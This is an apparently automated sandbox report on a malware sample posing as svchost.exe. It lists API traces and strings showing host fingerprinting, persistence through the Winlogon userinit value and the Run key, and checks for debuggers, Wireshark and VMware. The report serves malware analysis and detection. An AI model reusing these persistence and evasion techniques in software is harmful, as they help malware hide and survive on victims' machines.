                                                                                                                                                                                                                control_flow_graph 466 2d23220-2d2325a memset call 2d44c00 469 2d23260-2d2326d call 2d44d00 466->469 470 2d23417-2d2341e 466->470 473 2d23273-2d232b0 GetEnvironmentVariableA PathAddBackslashA GetVolumeInformationA 469->473 474 2d233c5-2d233db GetProcessHeap HeapValidate 469->474 475 2d232b2 473->475 476 2d232b9-2d232d6 RegOpenKeyExA 473->476 477 2d233ec-2d233f1 474->477 478 2d233dd-2d233e6 GetProcessHeap HeapFree 474->478 475->476 479 2d232d8-2d232f9 RegQueryValueExA RegCloseKey 476->479 480 2d232ff-2d23304 476->480 481 2d233f3-2d233fd GetProcessHeap HeapValidate 477->481 482 2d2340e-2d23416 477->482 478->477 479->480 484 2d23306 480->484 485 2d23309-2d23315 480->485 481->482 483 2d233ff-2d23408 GetProcessHeap HeapFree 481->483 483->482 484->485 486 2d23317-2d2331c 485->486 487 2d2331e-2d23321 CharUpperA 485->487 488 2d23323-2d2334d CharUpperA _snprintf 486->488 487->488 489 2d23350-2d23355 488->489 489->489 490 2d23357-2d23359 489->490 491 2d2335b 490->491 492 2d233bd-2d233c0 490->492 493 2d23360-2d23365 491->493 492->474 494 2d23366-2d2336c 493->494 494->494 495 2d2336e-2d2337d 494->495 496 2d23380-2d23385 495->496 496->496 497 2d23387-2d233ad _snprintf 496->497 498 2d233b0-2d233b5 497->498 498->498 499 2d233b7-2d233bb 498->499 499->492 499->493
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 02D23246
                                                                                                                                                                                                                  • Part of subcall function 02D44C00: memset.MSVCRT ref: 02D44C33
                                                                                                                                                                                                                  • Part of subcall function 02D44C00: GetProcessHeap.KERNEL32(00000008,00000110,?,00000000), ref: 02D44C42
                                                                                                                                                                                                                  • Part of subcall function 02D44C00: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 02D44C49
                                                                                                                                                                                                                  • Part of subcall function 02D44C00: memset.MSVCRT ref: 02D44C61
                                                                                                                                                                                                                  • Part of subcall function 02D44C00: GetUserNameA.ADVAPI32(00000000,00000104), ref: 02D44C78
                                                                                                                                                                                                                  • Part of subcall function 02D44C00: GetLastError.KERNEL32(?,?,?,?,00000000), ref: 02D44C7E
                                                                                                                                                                                                                  • Part of subcall function 02D44C00: GetUserNameA.ADVAPI32(00000000,00000104), ref: 02D44C9F
                                                                                                                                                                                                                  • Part of subcall function 02D44C00: StrChrIA.SHLWAPI(?,?,?,00000000,?,?,?,?,00000000), ref: 02D44CC6
                                                                                                                                                                                                                  • Part of subcall function 02D44C00: lstrcpynA.KERNEL32(?,00000001,00000104,?,?,00000000,?,?,?,?,00000000), ref: 02D44CDA
                                                                                                                                                                                                                  • Part of subcall function 02D44D00: memset.MSVCRT ref: 02D44D34
                                                                                                                                                                                                                  • Part of subcall function 02D44D00: GetProcessHeap.KERNEL32(00000008,00000110,?,00000000,00000000), ref: 02D44D43
                                                                                                                                                                                                                  • Part of subcall function 02D44D00: HeapAlloc.KERNEL32(00000000,?,00000000,00000000), ref: 02D44D4A
                                                                                                                                                                                                                  • Part of subcall function 02D44D00: memset.MSVCRT ref: 02D44D62
                                                                                                                                                                                                                  • Part of subcall function 02D44D00: GetComputerNameA.KERNEL32(00000000,00000104), ref: 02D44D79
                                                                                                                                                                                                                  • Part of subcall function 02D44D00: GetLastError.KERNEL32(?,?,?,?,00000000,00000000), ref: 02D44D7F
                                                                                                                                                                                                                  • Part of subcall function 02D44D00: GetComputerNameA.KERNEL32(00000000,00000104), ref: 02D44DA0
                                                                                                                                                                                                                  • Part of subcall function 02D44D00: StrChrIA.SHLWAPI(?,?,?,00000000,?,?,?,?,00000000,00000000), ref: 02D44DC7
                                                                                                                                                                                                                  • Part of subcall function 02D44D00: lstrcpynA.KERNEL32(?,00000001,00000104,?,?,00000000,?,?,?,?,00000000,00000000), ref: 02D44DDB
                                                                                                                                                                                                                • GetEnvironmentVariableA.KERNEL32(SystemDrive,?,00000104,?,?,76EEC3F0), ref: 02D23284
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(?,?,?,76EEC3F0), ref: 02D23291
                                                                                                                                                                                                                • GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,76EEC3F0), ref: 02D232A8
                                                                                                                                                                                                                • RegOpenKeyExA.KERNEL32(80000002,Software\Microsoft\Windows NT\CurrentVersion,00000000,00000101,?,?,?,76EEC3F0), ref: 02D232CE
                                                                                                                                                                                                                • RegQueryValueExA.KERNEL32(?,InstallDate,00000000,?,?,?,?,?,76EEC3F0), ref: 02D232EF
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,76EEC3F0), ref: 02D232F9
                                                                                                                                                                                                                • CharUpperA.USER32(00000000,?,?,76EEC3F0), ref: 02D2331F
                                                                                                                                                                                                                • CharUpperA.USER32(00000000,?,?,?,76EEC3F0), ref: 02D23328
                                                                                                                                                                                                                • _snprintf.MSVCRT ref: 02D23341
                                                                                                                                                                                                                • _snprintf.MSVCRT ref: 02D2339F
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,?,76EEC3F0), ref: 02D233CE
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000,?,?,76EEC3F0), ref: 02D233D7
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,02D368CF,?,?,76EEC3F0), ref: 02D233E3
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,?,76EEC3F0), ref: 02D233E6
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,?,76EEC3F0), ref: 02D233F6
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000,?,?,76EEC3F0), ref: 02D233F9
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,?,76EEC3F0), ref: 02D23405
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,?,76EEC3F0), ref: 02D23408
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Process$memset$Name$CharComputerErrorFreeLastUpperUserValidate_snprintflstrcpyn$AllocAllocateBackslashCloseEnvironmentInformationOpenPathQueryValueVariableVolume
                                                                                                                                                                                                                • String ID: %02X$%53%59%53%54%45%4D%21%35%32%38%31%31%30%21%33%44%45%41%42%44%45%39$%s!%s!%08X$InstallDate$SYSTEM$SYSTEM!528110!3DEABDE9$Software\Microsoft\Windows NT\CurrentVersion$SystemDrive
                                                                                                                                                                                                                • API String ID: 3299431409-4268508191
                                                                                                                                                                                                                • Opcode ID: c19a991c08fbdfbf5e5370d85537b36fae799228718fc7da7bf870341f8fded1
                                                                                                                                                                                                                • Instruction ID: 7dd2c1cb86376f163c59a3d0c8689f8ca0b285e4511f285e31c9802091319d0d
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c19a991c08fbdfbf5e5370d85537b36fae799228718fc7da7bf870341f8fded1
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5C51D271E00215ABEB209BA5AC8DFAB7BB8EF98704F444585F545D7300EA749E48CBB0

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 648 4021b0-4022fe CreateFileA 649 402330-402335 648->649 650 402300-40232a DeviceIoControl CloseHandle 648->650 650->649
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CreateFileA.KERNEL32(\\.\KmxAgent,00000000,00000000,00000000,00000003,00000080,00000000), ref: 004022F3
                                                                                                                                                                                                                • DeviceIoControl.KERNEL32(00000000,86000054,000000B4,000000B4,?,00000004,?,00000000), ref: 00402323
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040232A
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2909940532.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2909940532.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CloseControlCreateDeviceFileHandle
                                                                                                                                                                                                                • String ID: "$"$0$4$D$E$E$S$T$\\.\KmxAgent$d$e$g$m$m$s$t$t
                                                                                                                                                                                                                • API String ID: 33631002-3172865025
                                                                                                                                                                                                                • Opcode ID: 5d3052d786f23041ab38784f47b9df179f9997e430cc2c34ba2090ab9676636a
                                                                                                                                                                                                                • Instruction ID: 9d4a94b5be36249e2462cbbb3280e2e36e0391c5559e4b339ada8e43b165569f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5d3052d786f23041ab38784f47b9df179f9997e430cc2c34ba2090ab9676636a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D04194B0D01358DEEB20CF95D9887DEFEB5BB04309F5081ADD5186B241C7B90A89CF55

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 651 2d27220-2d2722f 652 2d27366-2d2736b 651->652 653 2d27235-2d27251 CreateFileA 651->653 655 2d27387 652->655 656 2d2736d-2d2737a IsBadWritePtr 652->656 653->652 654 2d27257-2d2726f GetFileSizeEx 653->654 658 2d27275-2d27278 654->658 659 2d2733f-2d27348 654->659 657 2d27389-2d2738f 655->657 656->657 660 2d2737c-2d27384 656->660 662 2d2727a 658->662 663 2d2727b-2d2727f 658->663 659->652 661 2d2734a-2d27357 GetHandleInformation 659->661 661->652 664 2d27359-2d2735d 661->664 662->663 665 2d27281-2d2729e GetProcessHeap RtlAllocateHeap 663->665 666 2d272af-2d272b4 663->666 664->652 669 2d2735f-2d27360 FindCloseChangeNotification 664->669 665->666 670 2d272a0-2d272ac memset 665->670 667 2d272ba-2d272be 666->667 668 2d2733c 666->668 671 2d272c0 667->671 672 2d272c1-2d272ca 667->672 668->659 669->652 670->666 671->672 673 2d27311-2d27323 GetProcessHeap HeapValidate 672->673 674 2d272cc-2d2730f SetFilePointer LockFile ReadFile UnlockFile 672->674 675 2d27335 673->675 676 2d27325-2d2732f GetProcessHeap HeapFree 673->676 674->668 674->673 675->668 676->675
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,?,a1633ec9a,76EEC3F0,?,?,02D322F0,00000000,00000001), ref: 02D27246
                                                                                                                                                                                                                • GetFileSizeEx.KERNEL32(00000000,?,?,?,02D322F0,00000000,00000001,?,74DEF550,00000000), ref: 02D27264
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,?,?,?,02D322F0,00000000,00000001,?,74DEF550,00000000), ref: 02D2728D
                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000,?,?,02D322F0,00000000,00000001,?,74DEF550,00000000), ref: 02D27294
                                                                                                                                                                                                                • memset.MSVCRT ref: 02D272A7
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D272D3
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02D272E3
                                                                                                                                                                                                                • ReadFile.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 02D272F2
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02D27305
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D27314
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 02D2731B
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D27328
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 02D2732F
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02D2734F
                                                                                                                                                                                                                • FindCloseChangeNotification.KERNEL32(00000000), ref: 02D27360
                                                                                                                                                                                                                • IsBadWritePtr.KERNEL32(00000000,00000004,?,a1633ec9a,76EEC3F0,?,?,02D322F0,00000000,00000001,?,74DEF550,00000000), ref: 02D27370
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: FileHeap$Process$AllocateChangeCloseCreateFindFreeHandleInformationLockNotificationPointerReadSizeUnlockValidateWritememset
                                                                                                                                                                                                                • String ID: a1633ec9a
                                                                                                                                                                                                                • API String ID: 213124939-972184491
                                                                                                                                                                                                                • Opcode ID: a1d4bb93cd79c3f812744339e6142818ad94688ae9483c155f1500f5e0774747
                                                                                                                                                                                                                • Instruction ID: e1c74dba74316b7f22476204b10073ec95081f21b0b8cff36019ae1627b55a5a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a1d4bb93cd79c3f812744339e6142818ad94688ae9483c155f1500f5e0774747
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E5419171A81314BBEB309FA5AC4CF9BBBA8EB54B14F508514FA55E6380D7748D44CBA0

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 00401152
                                                                                                                                                                                                                • memset.MSVCRT ref: 00401171
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 0040118A
                                                                                                                                                                                                                • RegCreateKeyExA.KERNEL32(80000002,software\microsoft\windows nt\currentversion\winlogon,00000000,00000000,00000000,00000102,00000000,?,00000000,?,?,?,?,?,00000000), ref: 004011B0
                                                                                                                                                                                                                • GetEnvironmentVariableA.KERNEL32(SystemDrive,?,00000104,?,?,?,?,?,00000000), ref: 004011CF
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(?,?,?,?,?,?,00000000), ref: 004011DC
                                                                                                                                                                                                                • GetVolumeInformationA.KERNEL32(?,00000000,00000000,000FF0FF,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000), ref: 004011F3
                                                                                                                                                                                                                • _snprintf.MSVCRT ref: 0040120E
                                                                                                                                                                                                                • RegSetValueExA.KERNELBASE(?,?,00000000,00000001,?,00000104,7604DB30), ref: 00401275
                                                                                                                                                                                                                • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft\windows\currentversion\run,00000000,00000102,?,?,?,?,?,?,00000000), ref: 00401294
                                                                                                                                                                                                                • RegSetValueExA.ADVAPI32(?,userinit,00000000,00000001,?,00000104,?,?,?,?,?,00000000), ref: 004012B0
                                                                                                                                                                                                                • RegFlushKey.ADVAPI32(?,?,?,?,?,?,00000000), ref: 004012BE
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,00000000), ref: 004012C8
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • userinit, xrefs: 004012AA
                                                                                                                                                                                                                • software\microsoft\windows\currentversion\run, xrefs: 0040128A
                                                                                                                                                                                                                • software\microsoft\windows nt\currentversion\winlogon, xrefs: 004011A6
                                                                                                                                                                                                                • SystemDrive, xrefs: 004011CA
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2909940532.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2909940532.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Valuememset$AdminBackslashCloseCreateEnvironmentFlushInformationOpenPathUserVariableVolume_snprintf
                                                                                                                                                                                                                • String ID: SystemDrive$software\microsoft\windows nt\currentversion\winlogon$software\microsoft\windows\currentversion\run$userinit
                                                                                                                                                                                                                • API String ID: 1223198359-2324515132
                                                                                                                                                                                                                • Opcode ID: 8f54ca177bf132b48ff55439b3f2ba1deef55dafc0629b9cb850c6a94148175c
                                                                                                                                                                                                                • Instruction ID: 4a3cd719fa0b6a36e3fea1ee33c0aaef39b8e779ef0c2e0c240036d9f7b98d71
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8f54ca177bf132b48ff55439b3f2ba1deef55dafc0629b9cb850c6a94148175c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5341BEB164020CBFEB10DBA49DC9EEA777CEB94704F0041B9F345B6191E6B45F888BA4

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 694 2d26110-2d261d9 memset * 3 695 2d261e0-2d261ea 694->695 695->695 696 2d261ec-2d26203 695->696 697 2d26210-2d26238 strtol 696->697 697->697 698 2d2623a-2d26244 697->698 699 2d26250-2d2625e 698->699 699->699 700 2d26260 699->700 701 2d26262-2d26271 700->701 702 2d26273 701->702 703 2d26275-2d2627c 701->703 702->703 703->701 704 2d2627e-2d262b3 call 2d37c10 strstr 703->704 707 2d262b5-2d262bd 704->707 708 2d262be-2d262cf strstr 704->708 708->707 709 2d262d1-2d262e3 strtol 708->709 709->707 710 2d262e5-2d262ec 709->710 711 2d262ee-2d262fe 710->711 712 2d2634f-2d26367 GetProcessHeap RtlAllocateHeap 710->712 715 2d26303-2d26317 711->715 713 2d263a5-2d263ad 712->713 714 2d26369-2d263a2 memset * 2 _snprintf 712->714 714->713 716 2d26319-2d2631d 715->716 717 2d2631e 715->717 716->717 718 2d26333-2d26340 717->718 719 2d26320-2d26331 717->719 720 2d26344-2d2634d 718->720 719->720 720->712 721 2d26300 720->721 721->715
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memset$strstrstrtol
                                                                                                                                                                                                                • String ID: %s%s$1676d5775e05c50b46baa5579d4fc7$eyuioa$qwrtpsdfghjklzxcvbnm
                                                                                                                                                                                                                • API String ID: 600650289-3097137778
                                                                                                                                                                                                                • Opcode ID: f05dd0fdd128a9c2338325cfc6c244b22310001a596dc2c53c4ed83e3d68785f
                                                                                                                                                                                                                • Instruction ID: 9aa08610b9e181cb9bbe663269568dd9ede6287ed1b0b8288bfc58a4ff4d1bd4
                                                                                                                                                                                                                • Opcode Fuzzy Hash: f05dd0fdd128a9c2338325cfc6c244b22310001a596dc2c53c4ed83e3d68785f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 09715830E443555FDB15CB68AC84BDEBBB9EF68704F0444A8D988E7381D7709E99CBA0

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 02D2347B
                                                                                                                                                                                                                • GetEnvironmentVariableA.KERNEL32(SystemDrive,?,00000104), ref: 02D2349A
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(?), ref: 02D234A7
                                                                                                                                                                                                                • GetVolumeInformationA.KERNEL32(?,00000000,00000000,000FF0FF,00000000,00000000,00000000,00000000), ref: 02D234C4
                                                                                                                                                                                                                • _snprintf.MSVCRT ref: 02D234DF
                                                                                                                                                                                                                • RegOpenKeyExA.KERNEL32(80000002,software\microsoft\windows nt\currentversion\winlogon,00000000,00000101,00000000), ref: 02D23503
                                                                                                                                                                                                                • RegQueryValueExA.KERNEL32(00000000,?,00000000,00000001,C:\Windows\apppatch\svchost.exe,00000104), ref: 02D2351F
                                                                                                                                                                                                                • PathFileExistsA.SHLWAPI(C:\Windows\apppatch\svchost.exe,C:\Windows\apppatch\svchost.exe,C:\Windows\apppatch\svchost.exe), ref: 02D235AD
                                                                                                                                                                                                                • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft\windows\currentversion\run,00000000,00000101,00000000), ref: 02D235CC
                                                                                                                                                                                                                • RegQueryValueExA.ADVAPI32(00000000,userinit,00000000,00000001,C:\Windows\apppatch\svchost.exe,00000104), ref: 02D235E6
                                                                                                                                                                                                                • RegCloseKey.KERNEL32(00000000), ref: 02D235F5
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: OpenPathQueryValue$BackslashCloseEnvironmentExistsFileInformationVariableVolume_snprintfmemset
                                                                                                                                                                                                                • String ID: C:\Windows\apppatch\svchost.exe$SystemDrive$software\microsoft\windows nt\currentversion\winlogon$software\microsoft\windows\currentversion\run$userinit
                                                                                                                                                                                                                • API String ID: 3269704094-4271125494
                                                                                                                                                                                                                • Opcode ID: 74d1a47187b2e0a0405ec22b056fddf9072c861ffd8d7149041070e3b7d8b68a
                                                                                                                                                                                                                • Instruction ID: 836802f09f5bf6a3c8e96350a357ea2d13edaade3a7acd277564642c0af022a9
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 74d1a47187b2e0a0405ec22b056fddf9072c861ffd8d7149041070e3b7d8b68a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7841CC71A8020DBBFB14CB54EC8EFED7779EF54704F504598E545A7280E6B49E88CBA0

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 737 401000-40101c IsDebuggerPresent 738 401022-401032 FindWindowA 737->738 739 40111b-401123 737->739 738->739 740 401038-401061 memset CreateToolhelp32Snapshot 738->740 741 401063-40107d Process32First 740->741 742 4010d5-4010e1 call 401aa0 740->742 744 401083-401091 StrStrIA 741->744 748 4010e3-4010ef call 401aa0 742->748 749 401124-40112f 742->749 746 401115-401119 744->746 747 401097-4010a1 Process32Next 744->747 751 4010a7-4010b1 746->751 747->744 750 4010a3 747->750 748->749 758 4010f1-4010fd call 401aa0 748->758 750->751 753 4010d1-4010d3 751->753 754 4010b3-4010c1 GetHandleInformation 751->754 753->742 753->749 754->753 755 4010c3-4010c8 754->755 755->753 757 4010ca-4010cb FindCloseChangeNotification 755->757 757->753 758->749 761 4010ff-40110c PathFileExistsA 758->761 761->749 762 40110e-401114 761->762
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • IsDebuggerPresent.KERNEL32 ref: 00401014
                                                                                                                                                                                                                • FindWindowA.USER32(OLLYDBG,00000000), ref: 0040102A
                                                                                                                                                                                                                • memset.MSVCRT ref: 0040104B
                                                                                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00401056
                                                                                                                                                                                                                • Process32First.KERNEL32 ref: 00401071
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,wireshark.exe), ref: 0040108D
                                                                                                                                                                                                                • Process32Next.KERNEL32(00000000,?), ref: 0040109D
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000), ref: 004010B9
                                                                                                                                                                                                                • FindCloseChangeNotification.KERNEL32(00000000), ref: 004010CB
                                                                                                                                                                                                                • PathFileExistsA.SHLWAPI(\\?\globalroot\systemroot\system32\vmx_fb.dll,vmwaretray.exe,idag.exe,dumpcap.exe), ref: 00401104
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2909940532.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2909940532.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: FindProcess32$ChangeCloseCreateDebuggerExistsFileFirstHandleInformationNextNotificationPathPresentSnapshotToolhelp32Windowmemset
                                                                                                                                                                                                                • String ID: OLLYDBG$\\?\globalroot\systemroot\system32\vmx_fb.dll$dumpcap.exe$idag.exe$vmwaretray.exe$wireshark.exe
                                                                                                                                                                                                                • API String ID: 1862551656-1290435522
                                                                                                                                                                                                                • Opcode ID: 561d3b303acbb630b127acd8213a7a6d32d8b3e20dd43d251141123fbd81c6f9
                                                                                                                                                                                                                • Instruction ID: c60aa232edd69d9eafc6284c2fbf788a46e5342051cb1b5dbcb922c87a134ace
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 561d3b303acbb630b127acd8213a7a6d32d8b3e20dd43d251141123fbd81c6f9
                                                                                                                                                                                                                • Instruction Fuzzy Hash: AB31E9B160430057D310AB66AC49B6BB7ECDBD8764F01013BFF44F62E1E77C888586AA
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • IsDebuggerPresent.KERNEL32(02D26C17,00000000,?), ref: 02D21734
                                                                                                                                                                                                                • FindWindowA.USER32(OLLYDBG,00000000), ref: 02D2174A
                                                                                                                                                                                                                • memset.MSVCRT ref: 02D2176B
                                                                                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02D21776
                                                                                                                                                                                                                • Process32First.KERNEL32 ref: 02D21791
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,wireshark.exe), ref: 02D217AD
                                                                                                                                                                                                                • Process32Next.KERNEL32(00000000,?), ref: 02D217BD
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02D217D9
                                                                                                                                                                                                                • FindCloseChangeNotification.KERNEL32(00000000), ref: 02D217EB
                                                                                                                                                                                                                • PathFileExistsA.SHLWAPI(\\?\globalroot\systemroot\system32\vmx_fb.dll,vmwaretray.exe,idag.exe,dumpcap.exe), ref: 02D21824
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: FindProcess32$ChangeCloseCreateDebuggerExistsFileFirstHandleInformationNextNotificationPathPresentSnapshotToolhelp32Windowmemset
                                                                                                                                                                                                                • String ID: OLLYDBG$\\?\globalroot\systemroot\system32\vmx_fb.dll$dumpcap.exe$idag.exe$vmwaretray.exe$wireshark.exe
                                                                                                                                                                                                                • API String ID: 1862551656-1290435522
                                                                                                                                                                                                                • Opcode ID: ce6421b2d2444c25b49b855bd033f18d0e3627447580b0992b8399903382df4b
                                                                                                                                                                                                                • Instruction ID: da64432905578c29570c9903b16bcbbe2c1fadd0810e65cfe9f4266b8be073c6
